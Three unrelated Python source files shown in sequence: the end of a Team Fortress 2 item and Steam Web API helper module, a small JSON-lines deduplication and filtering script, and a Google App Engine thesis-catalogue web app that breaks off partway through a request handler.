    denoms['Weapon'] = 0
    return denoms
def getstoreprice(item, storeprices):
    """Get store price of item"""
    index = item['defindex']
    if index not in storeprices:
        return ''
    # Store prices arrive in cents; format as dollars.
    return '{:.2f}'.format(storeprices[index]['prices']['USD'] / 100.00)
def getmarketprice(item, marketprices):
    """Get market price of item"""
    return marketprices.get(item['defindex'], {})
def getitemattributes(item, allattributes, effects):
    """Get attributes of item"""
    result = []
    for itemattr in item.get('attributes', []):
        value = itemattr['value']
        attribute = allattributes[itemattr['name']]
        # Only visible attributes with display text are reported.
        if attribute['hidden'] or 'description_string' not in attribute:
            continue
        description = attribute['description_string']
        descformat = attribute['description_format']
        if descformat == 'value_is_particle_index':
            # Particle attributes display the effect's name, not the index.
            value = effects[value]['name']
            description = description.replace('%s1', '{}')
        else:
            if descformat == 'value_is_percentage':
                value = (value * 100) - 100
            elif descformat == 'value_is_inverted_percentage':
                value = 100 - (value * 100)
            elif descformat == 'value_is_additive_percentage':
                value *= 100
            description = description.replace('%s1', '{:g}')
        description = description.format(value)
        effecttype = attribute['effect_type']
        # 'unusual' renders the same as neutral.
        if effecttype == 'unusual':
            effecttype = 'neutral'
        result.append({'description': description, 'type': effecttype})
    order = ('neutral', 'positive', 'negative')
    return sorted(result, key=lambda entry: order.index(entry['type']))
def getitemclasses(item):
    """Get the TF2 classes that can use this item"""
    if 'used_by_classes' not in item:
        return []
    class_order = list(getallclasses().keys())
    return sorted(item['used_by_classes'], key=class_order.index)
def getitemtags(item):
    """Get a list of tags that describe the item"""
    tags = []
    itemclass = item['item_class']
    typename = item['item_type_name']
    hat_typenames = ('#TF_Wearable_Hat', 'Hat', 'Mask',
                     'Holiday Hat', 'Headset', 'Hair')
    if itemclass == 'bundle':
        tags.append(itemclass)
    elif itemclass == 'craft_item':
        tags.append('craft')
    elif itemclass.endswith('_token'):
        tags.append('token')
    if 'item_slot' in item:
        slot = item['item_slot']
        # Weapon-slot items are weapons unless they are slot tokens.
        if slot in getweapontags() and itemclass != 'slot_token':
            tags.append('weapon')
        if slot == 'misc':
            tags.append('cosmetic')
        # Hats are tagged as such; everything else carries its slot name.
        if typename in hat_typenames:
            tags.append('hat')
        else:
            tags.append(slot)
    if typename == 'Tournament Medal':
        tags.append('tournament')
    if 'tool' in item:
        tags.append('tool')
        if item['tool']['type'] == 'paint_can':
            tags.append('paint')
    if item.get('holiday_restriction') == 'halloween_or_fullmoon':
        tags.append('halloween')
    return tags
def getobsoleteindexes():
    """Return the indexes of obsolete items that have newer versions"""
    map_stamps = {2007, 2015, 2049, 2079, 2123, 2125, 2138, 2139, 2140,
                  2143, 2155, 2156}
    starter_packs = set(range(2018, 2027)).union(range(2094, 2103))
    obsolete = {699, 2093}
    obsolete.update(map_stamps)
    obsolete.update(starter_packs)
    return obsolete
async def getplayerbackpack(apikey, steamid):
    """Return the player backpack of the given steamid"""
    url = ('https://api.steampowered.com/IEconItems_440/GetPlayerItems/v0001/'
           f'?key={apikey}&steamid={steamid}')
    data = await _getjsonresponse(url)
    # 'result' is absent for private or missing backpacks.
    return data.get('result')
async def getplayersummary(apikey, steamid):
    """Return the player summary of the given steamid"""
    summaries = await getplayersummaries(apikey, [steamid])
    return summaries[0]
async def getplayersummaries(apikey, steamids):
    """Return the player summaries of a list of steamids"""
    joined = ','.join(steamids)
    url = ('https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/'
           f'?key={apikey}&steamids={joined}')
    data = await _getjsonresponse(url)
    return data['response']['players']
async def resolvevanityurl(apikey, vanityurl):
    """Return the steamid of a given vanity url"""
    url = ('https://api.steampowered.com/ISteamUser/ResolveVanityURL/v0001/'
           f'?key={apikey}&vanityurl={vanityurl}')
    data = await _getjsonresponse(url)
    response = data['response']
    # success == 1 means resolved; otherwise fall through to None.
    return response['steamid'] if response['success'] == 1 else None
async def _getjsonresponse(url):
    """Fetch *url* and return the decoded JSON body as Python objects."""
    headers = {'User-Agent': 'tf2api'}
    async with aiohttp.ClientSession(headers=headers) as session:
        async with session.get(url) as response:
            # Decode manually instead of response.json() so the content-type
            # header reported by the server is irrelevant.
            return json.loads((await response.read()).decode())
|
|
#coding=utf-8
#2014.12.13
#author@shibin
import json
#import datetime
import sys
def get_part_info(input_fname, output_fname):
    """Extract the 'uin' field from each JSON line of *input_fname* and
    write one unique uin per line to *output_fname*.

    Blank lines are skipped and an empty read ends the loop. Bug fix: a
    stray `continue` (left behind when the duplicate-check `if` was
    commented out) made the output writes unreachable, so the output file
    was always empty; the evident dedup intent is restored.
    """
    def part_info(line_data):
        # Pull the uin out of one JSON record; None when the key is absent.
        uin = json.loads(line_data).get('uin')
        if uin is not None:
            uin = str(uin)
        return uin

    seen = {}
    with open(input_fname, "r") as input_f, open(output_fname, "w") as output:
        for line in input_f:
            if line == "\n":
                continue
            if line == "":
                break
            part = part_info(line)
            if part is None:
                continue
            if part in seen:
                continue
            seen[part] = 1
            output.write(part.strip())
            output.write('\n')
def filter_err_line(input_fname, output_fname, err_output=None):
    """Copy JSON-parseable lines from *input_fname* to *output_fname*.

    Lines that fail to parse go to *err_output* when given, otherwise they
    are dropped. Blank lines are skipped; an empty read ends the loop.

    Improvements: files are managed with `with`/`finally` instead of manual
    close, the bare `except` now catches only ValueError (the base of
    json.JSONDecodeError), and the unused `load_data` local was removed.
    """
    err = open(err_output, 'w+') if err_output is not None else None
    try:
        with open(input_fname, "r") as input_f, \
                open(output_fname, "w") as output:
            for line in input_f:
                if line == "\n":
                    continue
                if line == "":
                    break
                try:
                    json.loads(line)
                    output.write(line)
                except ValueError:
                    if err is not None:
                        err.write(line)
    finally:
        if err is not None:
            err.close()
def together_id(input_fname, output_fname):
    """Deduplicate tab-separated lines by id, keeping the best line per id.

    Each line is "<id>\t<flag>...". For every id the line with the highest
    integer flag survives; on equal flags the later line wins. Surviving
    lines are written to *output_fname* in their original input order.

    Improvements: Python-2-only `dict.has_key()` and the `print` statement
    are replaced with `in` and `print()` so the script also runs under
    Python 3; files are managed with `with`.
    """
    def get_decode_data(line):
        return line.strip().split('\t')

    def get_id_part(doc):
        return doc[0]

    def get_compare_part(doc):
        return int(doc[1])

    def compare_change(this_flag, old_flag):
        # True when this line should replace the stored one; >= keeps the
        # most recent line on ties. Returns None (not False) otherwise,
        # matching the original contract.
        if this_flag >= old_flag:
            return True
        return None

    # First pass: map each id to (best flag, line number of best line).
    id_compare_dict = {}
    line_count = 0
    with open(input_fname, "r") as input_f:
        for line in input_f:
            if line == "\n":
                continue
            if line == "":
                break
            line_count += 1
            this_doc = get_decode_data(line)
            this_id = get_id_part(this_doc)
            this_flag = get_compare_part(this_doc)
            if this_id not in id_compare_dict:
                id_compare_dict[this_id] = (this_flag, line_count)
                continue
            old_flag = id_compare_dict[this_id][0]
            if compare_change(this_flag, old_flag) is True:
                id_compare_dict[this_id] = (this_flag, line_count)
    print(len(id_compare_dict.keys()), line_count)
    # Collect the winning line numbers.
    lines = {}
    for ki in id_compare_dict:
        lines[id_compare_dict[ki][1]] = 1
    # Second pass: emit only the winning lines, preserving input order.
    with open(input_fname, "r") as input_f, \
            open(output_fname, "w") as output:
        line_count = 0
        for line in input_f:
            if line == "\n":
                continue
            if line == "":
                break
            line_count += 1
            if line_count in lines:
                output.write(line)
#
def combine_data(input_fname, add_fname, output_fname):
    # Join two files on item id: index add_fname by id in one pass, then
    # stream input_fname and emit each record that has matching add-data.
    # NOTE(review): the '***' field names look like redacted placeholders;
    # this function cannot run as-is until they are restored.
    def get_input_doc(input_line):
        # Input line format: "<item_id>\t<json object>".
        line_list = input_line.split('\t', 1)
        item_id = line_list[0]
        json_line = line_list[1]
        doc = json.loads(json_line)
        input_doc = {}
        input_doc['id'] = item_id
        input_doc['data'] = doc
        return input_doc
    def get_add_doc(add_line):
        # Add line format: one JSON object per line carrying 'item_id'.
        doc = json.loads(add_line)
        add_doc = {}
        add_doc['id'] = doc['item_id']
        add_doc['data'] = (doc['***'], doc['***'])
        return add_doc
    def make_id_output(input_doc, add_doc):
        # Merge one add-field into the record and re-serialize it.
        # NOTE(review): .encode('utf-8') yields bytes on Python 3, which a
        # text-mode write() rejects — this code targets Python 2.
        item_id = input_doc['id']
        doc = input_doc['data']
        doc['***'] = add_doc[1]
        return item_id + '\t' + json.dumps(doc, ensure_ascii=False).encode('utf-8')
    combine_by_id = True
    if combine_by_id:
        # Pass 1: build the id -> add-data index.
        id_add = {}
        add_f = open(add_fname, 'r')
        for line in add_f:
            if line == "\n":
                continue
            if line == "":
                break
            add_doc = get_add_doc(line)
            if add_doc == None:
                continue
            id_add[add_doc['id']] = add_doc['data']
        add_f.close()
        # Pass 2: emit merged records; inputs without add-data are skipped.
        input_f = open(input_fname, 'r')
        output = open(output_fname, 'w')
        for line in input_f:
            if line == "\n":
                continue
            if line == "":
                break
            input_doc = get_input_doc(line)
            if input_doc == None:
                continue
            add_doc = id_add.get(input_doc['id'])
            if add_doc == None:
                pass
                continue
            new_line = make_id_output(input_doc, add_doc)
            output.write(new_line)
            output.write('\n')
        input_f.close()
        output.close()
if __name__ == '__main__':
    # Command-line dispatch: the first argument selects the operation.
    mode = sys.argv[1]
    if mode == "-part":
        get_part_info(sys.argv[2], sys.argv[3])
    if mode == "-tgid":
        together_id(sys.argv[2], sys.argv[3])
    if mode == "-ferr":
        err = sys.argv[4] if len(sys.argv) == 5 else None
        filter_err_line(sys.argv[2], sys.argv[3], err_output=err)
    if mode == "-comb":
        combine_data(sys.argv[2], sys.argv[3], sys.argv[4])
|
|
import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import os
import logging
import json
import csv
# Jinja2 environment rooted at this file's directory; autoescape guards
# rendered template output against HTML injection.
JINJA_ENVIRONMENT = jinja2.Environment(
    loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
    extensions=['jinja2.ext.autoescape'],
    autoescape=True)
class thesisentry(ndb.Model):
    """Datastore record for a single thesis.

    NOTE(review): lowercase class name is kept — renaming would change the
    datastore kind and orphan existing entities.
    """
    thesis_year = ndb.StringProperty()
    thesis_title = ndb.StringProperty(indexed=True)
    thesis_abstract = ndb.TextProperty()
    thesis_adviser = ndb.KeyProperty(kind='Faculty', indexed=True)
    thesis_section = ndb.StringProperty()
    thesis_department = ndb.KeyProperty(kind='Department', indexed=True)
    # Proponents may reference Student or Faculty keys (see APIHandler.post).
    thesis_proponent = ndb.KeyProperty(kind='Student', repeated=True)
    # Title words of 3+ chars, used as search tags.
    thesis_tags = ndb.StringProperty(repeated=True)
    thesis_author = ndb.KeyProperty(indexed=True)
    date = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def get_by_name(model, name):
        """Return the first thesis whose title equals *name*, or None."""
        try:
            student = model.query(model.thesis_title == name)
            return student.get()
        except Exception:
            # Broad on purpose: lookup failures are reported as "not found".
            return None
class User(ndb.Model):
    """Application user, keyed elsewhere on the Google account user_id."""
    email = ndb.StringProperty(indexed=True)
    first_name = ndb.StringProperty()
    last_name = ndb.StringProperty()
    phone_number = ndb.IntegerProperty()
    # Admins get the create/edit links and pages; see the handlers below.
    is_admin = ndb.BooleanProperty()
    created_date = ndb.DateTimeProperty(auto_now_add=True)
class Faculty(ndb.Model):
    """Faculty member; keyed on the normalized full name (see FacultyHandler)."""
    faculty_title = ndb.StringProperty(indexed=True)
    faculty_fname = ndb.StringProperty(indexed=True)
    faculty_sname = ndb.StringProperty(indexed=True)
    # Convenience copy: "<fname> <sname>", used for lookups by full name.
    faculty_full = ndb.StringProperty(indexed=True)
    faculty_email = ndb.StringProperty(indexed=True)
    faculty_phone = ndb.StringProperty(indexed=True)
    faculty_bday = ndb.StringProperty(indexed=True)
    faculty_department = ndb.KeyProperty(kind='Department', indexed=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def get_by_name(model, name):
        """Return the first faculty whose full name equals *name*, or None."""
        try:
            adviser = model.query(model.faculty_full == name)
            return adviser.get()
        except Exception:
            # Broad on purpose: lookup failures are reported as "not found".
            return None
    @classmethod
    def get_by_keyname(model, key):
        """Return the faculty entity with string/int id *key*, or None."""
        try:
            return model.get_by_id(key)
        except Exception:
            return None
class Student(ndb.Model):
    """Student; keyed on the normalized full name (see StudentHandler)."""
    student_fname = ndb.StringProperty(indexed=True)
    student_sname = ndb.StringProperty(indexed=True)
    # Convenience copy: "<fname> <sname>", used for lookups by full name.
    student_full = ndb.StringProperty(indexed=True)
    student_email = ndb.StringProperty(indexed=True)
    student_phone = ndb.StringProperty(indexed=True)
    student_number = ndb.StringProperty(indexed=True)
    student_graduated = ndb.IntegerProperty(indexed=True)
    student_bday = ndb.StringProperty(indexed=True)
    student_department = ndb.KeyProperty(kind='Department', indexed=True)
    # Individual name words (len > 1), for partial-name search.
    student_name_portions = ndb.StringProperty(repeated=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def get_by_name(model, name):
        """Return the first student whose full name equals *name*, or None."""
        try:
            student = model.query(model.student_full == name)
            return student.get()
        except Exception:
            # Broad on purpose: lookup failures are reported as "not found".
            return None
class University(ndb.Model):
    """University; keyed on the normalized initials (see UniversityHandler)."""
    university_name = ndb.StringProperty(indexed=True)
    university_initial = ndb.StringProperty(indexed=True)
    university_address = ndb.StringProperty(indexed=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
class Department(ndb.Model):
    """Department; keyed on the normalized name (see DepartmentHandler)."""
    department_college = ndb.KeyProperty(kind='College', indexed=True)
    department_name = ndb.StringProperty(indexed=True)
    department_chair = ndb.KeyProperty(kind='Faculty', indexed=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def get_by_name(model, name):
        """Return the first department with this name, or None."""
        try:
            department = model.query(model.department_name == name)
            return department.get()
        except Exception:
            # Broad on purpose: lookup failures are reported as "not found".
            return None
class College(ndb.Model):
    """College within a university; keyed on the normalized name."""
    college_university = ndb.KeyProperty(kind='University', indexed=True)
    college_name = ndb.StringProperty(indexed=True)
    # Back-references to this college's departments.
    college_departments = ndb.KeyProperty(repeated=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
class MainPageHandler(webapp2.RequestHandler):
    def get(self):
        """Render the main page; unauthenticated visitors get the login page,
        unregistered accounts are sent to registration."""
        account = users.get_current_user()
        if not account:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', account.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        # Admins additionally get the create-entry links.
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template = JINJA_ENVIRONMENT.get_template('/pages/main.html')
        self.response.write(template.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class APIHandler(webapp2.RequestHandler):
    """JSON API over thesis entries.

    Bug fixes: the GET content type was 'application.json' (dot instead of
    slash); the POST response concatenated the User entity itself with a
    string (TypeError) instead of using its first_name.
    """

    def get(self):
        """Return every thesis as JSON, newest first, for registered users."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                thesisdet = thesisentry.query().order(-thesisentry.date).fetch()
                thesis_list = []
                for thesis in thesisdet:
                    # Resolve the department with its college and university.
                    departmentlist = Department.query(
                        Department.key == thesis.thesis_department)
                    d = []
                    for de in departmentlist:
                        college = de.department_college.get()
                        university = college.college_university.get()
                        d.append({
                            'name': de.department_name,
                            'college': college.college_name,
                            'university': university.university_name,
                            'university_id': university.key.id()
                        })
                    facultylist = Faculty.query(
                        Faculty.key == thesis.thesis_adviser)
                    f = []
                    for fa in facultylist:
                        f.append({
                            'name': fa.faculty_full,
                            'faculty_id': fa.key.id()
                        })
                    thesis_list.append({
                        'id': thesis.key.id(),
                        'year': thesis.thesis_year,
                        'title': thesis.thesis_title,
                        'abstract': thesis.thesis_abstract,
                        'adviser': f,
                        'section': thesis.thesis_section,
                        'department': d,
                        'thesis_id': thesis.key.id()
                    })
                response = {
                    'result': 'OK',
                    'thesis_data': thesis_list
                }
                # BUG FIX: was 'application.json'.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
            else:
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url': login_url,
                'reg_url': '/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self):
        """Create a thesis entry from the submitted form fields."""
        thesis = thesisentry()
        loggedin_user = users.get_current_user()
        user_key = ndb.Key('User', loggedin_user.user_id())
        # Collect proponent keys from thesis_proponent_0..n form fields;
        # each may name a Student or, as a fallback, a Faculty member.
        thesis_proponents = []
        i = 0
        while (self.request.get('thesis_proponent_' + str(i)) is not None
               and self.request.get('thesis_proponent_' + str(i)) != ''):
            proponent = Student.query(
                Student.student_full == self.request.get('thesis_proponent_' + str(i)))
            if proponent.count():
                thesis_proponents.append(proponent.get().key)
            else:
                proponent = Faculty.query(
                    Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
                if proponent.count():
                    thesis_proponents.append(proponent.get().key)
                else:
                    thesis_proponents.append(None)
            i += 1
        logging.info(thesis_proponents)
        thesis_adviser_key = Faculty.query(
            Faculty.faculty_full == self.request.get('thesis_adviser')).get().key
        thesis_department_key = Department.query(
            Department.department_name == self.request.get('thesis_department')).get().key
        thesis.thesis_author = user_key
        thesis.thesis_year = self.request.get('thesis_year')
        thesis.thesis_title = self.request.get('thesis_title')
        thesis.thesis_abstract = self.request.get('thesis_abstract')
        thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
        thesis.thesis_section = self.request.get('thesis_section')
        thesis.thesis_proponent = thesis_proponents
        thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
        # Index every title word of 3+ characters as a search tag.
        tags = []
        for t in thesis.thesis_title.split():
            if len(t) >= 3 and t not in tags:
                tags.append(t)
        thesis.thesis_tags = tags
        thesis.put()
        self.response.headers['Content-Type'] = 'application/json'
        author = user_key.get()
        response = {
            'result': 'OK',
            'data': {
                'id': thesis.key.urlsafe(),
                'year': thesis.thesis_year,
                'title': thesis.thesis_title,
                'abstract': thesis.thesis_abstract,
                'section': thesis.thesis_section,
                # BUG FIX: was user_key.get() + ' ' + ... (entity + str).
                'author': author.first_name + ' ' + author.last_name
            }
        }
        self.response.out.write(json.dumps(response))
class LoginHandler(webapp2.RequestHandler):
    def get(self):
        """Route an authenticated visitor to /home when registered,
        otherwise to /register. Unauthenticated requests do nothing."""
        account = users.get_current_user()
        if not account:
            return
        if ndb.Key('User', account.user_id()).get():
            self.redirect('/home')
        else:
            self.redirect('/register')
class RegistrationHandler(webapp2.RequestHandler):
    """Sign-up flow: known faculty are auto-registered as admins, everyone
    else gets the registration form."""

    def get(self):
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            self.redirect(users.create_login_url('/register'))
            return
        user_key = ndb.Key('User', loggedin_user.user_id())
        user = user_key.get()
        # A faculty member logging in for the first time is auto-registered
        # as an admin account keyed on the Google user id.
        check = Faculty.query(
            Faculty.faculty_email == loggedin_user.email()).get()
        logging.info(check)
        if check is not None:
            user = User(is_admin=True, first_name=check.faculty_fname,
                        last_name=check.faculty_sname,
                        email=check.faculty_email,
                        id=loggedin_user.user_id())
            user.put()
            self.redirect('/home')
            # BUG FIX: the original fell through and issued a second
            # redirect below; stop after redirecting.
            return
        if user:
            self.redirect('/home')
        else:
            template_data = {
                'email': loggedin_user.email()
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/register.html')
            self.response.write(template.render(template_data))

    def post(self):
        """Persist a new non-admin User from the registration form."""
        user = User(id=users.get_current_user().user_id())
        # NOTE(review): int() raises ValueError on a non-numeric phone
        # number; form-side validation is assumed — TODO confirm.
        user.phone_number = int(self.request.get('phone_number'))
        user.email = self.request.get('email')
        user.first_name = self.request.get('first_name')
        user.last_name = self.request.get('last_name')
        user.is_admin = False
        user.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'first_name': user.first_name,
                'last_name': user.last_name,
                'phone_number': user.phone_number,
                'id': users.get_current_user().user_id()
            }
        }
        self.response.out.write(json.dumps(response))
class ThesisPageHandler(webapp2.RequestHandler):
    def get(self):
        """Render the thesis admin page; non-admins go back to /home."""
        account = users.get_current_user()
        if not account:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', account.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/thesis.html')
        self.response.write(template.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class FacultyHandler(webapp2.RequestHandler):
    def get(self):
        """Render the faculty admin page; non-admins go back to /home."""
        account = users.get_current_user()
        if not account:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', account.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/faculty.html')
        self.response.write(template.render({
            'links': links,
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))

    def post(self):
        """Create a Faculty entity keyed on the normalized full name."""
        department = Department.query(
            Department.department_name == self.request.get('faculty_department')).get()
        record = Faculty()
        record.faculty_title = self.request.get('faculty_title')
        record.faculty_fname = self.request.get('faculty_fname')
        record.faculty_sname = self.request.get('faculty_sname')
        full_name = record.faculty_fname + ' ' + record.faculty_sname
        record.faculty_full = full_name
        record.faculty_email = self.request.get('faculty_email')
        record.faculty_phone = self.request.get('faculty_phone')
        record.faculty_department = ndb.Key('Department', department.key.id())
        record.faculty_bday = self.request.get('faculty_bday')
        # Key = full name with spaces and punctuation stripped, lowercased.
        key_name = full_name.strip().replace(' ', '').replace('.', '').replace(',', '').lower()
        record.key = ndb.Key(Faculty, key_name)
        record.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'title': record.faculty_title,
                'first_name': record.faculty_fname,
                'last_name': record.faculty_sname,
                'full_name': record.faculty_full,
                'email': record.faculty_email,
                'phone': record.faculty_phone,
                'bday': record.faculty_bday,
            },
        }))
class StudentHandler(webapp2.RequestHandler):
    def get(self):
        """Render the student admin page; non-admins go back to /home.
        Unauthenticated requests do nothing (matching historic behavior)."""
        account = users.get_current_user()
        if not account:
            return
        user = ndb.Key('User', account.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/student.html')
        self.response.write(template.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))

    def post(self):
        """Create a Student entity keyed on the normalized full name."""
        department = Department.query(
            Department.department_name == self.request.get('student_department')).get()
        record = Student()
        record.student_fname = self.request.get('student_fname')
        record.student_sname = self.request.get('student_sname')
        record.student_full = record.student_fname + ' ' + record.student_sname
        record.student_phone = self.request.get('student_phone')
        record.student_email = self.request.get('student_email')
        record.student_number = self.request.get('student_number')
        record.student_graduated = int(self.request.get('student_graduated'))
        record.student_department = ndb.Key('Department', department.key.id())
        record.student_bday = self.request.get('student_bday')
        # Unique name words (len > 1) power partial-name search.
        portions = []
        for token in record.student_full.split():
            if len(token) > 1 and token not in portions:
                portions.append(token)
        record.student_name_portions = portions
        key_name = record.student_full.strip().replace(' ', '').replace('.', '').replace(',', '').lower()
        record.key = ndb.Key(Student, key_name)
        record.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'first_name': record.student_fname,
                'last_name': record.student_sname,
                'full_name': record.student_full,
                'phone': record.student_phone,
                'email': record.student_email,
                'student_number': record.student_number,
                'year_graduated': record.student_graduated,
            },
        }))
class UniversityHandler(webapp2.RequestHandler):
    def get(self):
        """Render the university admin page; non-admins go back to /home.
        Unauthenticated requests do nothing (matching historic behavior)."""
        account = users.get_current_user()
        if not account:
            return
        user = ndb.Key('User', account.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/home')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/university.html')
        self.response.write(template.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))

    def post(self):
        """Create a University entity keyed on its normalized initials."""
        record = University()
        record.university_name = self.request.get('university_name')
        record.university_initial = self.request.get('university_initial')
        record.university_address = self.request.get('university_address')
        key_name = record.university_initial.strip().replace(' ', '').replace('.', '').replace(',', '').lower()
        record.key = ndb.Key(University, key_name)
        record.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'university_name': record.university_name,
                'university_initial': record.university_initial,
                'university_address': record.university_address,
            },
        }))
class CollegeHandler(webapp2.RequestHandler):
    def get(self):
        """Render the college admin page; non-admins go to '/'.
        Unauthenticated requests do nothing (matching historic behavior)."""
        account = users.get_current_user()
        if not account:
            return
        user = ndb.Key('User', account.user_id()).get()
        if not user:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
            'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
            'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
            'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
            'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/college.html')
        self.response.write(template.render({
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))

    def post(self):
        """Create a College entity keyed on its normalized name."""
        university = University.query(
            University.university_name == self.request.get('college_university')).get()
        record = College()
        record.college_university = ndb.Key('University', university.key.id())
        record.college_name = self.request.get('college_name')
        key_name = record.college_name.strip().replace(' ', '').replace('.', '').replace(',', '').lower()
        record.key = ndb.Key(College, key_name)
        record.put()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({
            'result': 'OK',
            'data': {
                'college_name': record.college_name,
            },
        }))
class DepartmentHandler(webapp2.RequestHandler):
    def get(self):
        """Render the department-creation page for admin users.

        Non-admins are sent home and profile-less users to registration.
        Anonymous visitors now get the login page; previously this case fell
        through and returned an empty 200 response.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            # Consistent with the list handlers: show the login page.
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if not user.is_admin:
            self.redirect('/')
            return
        links = {
            'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
            'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
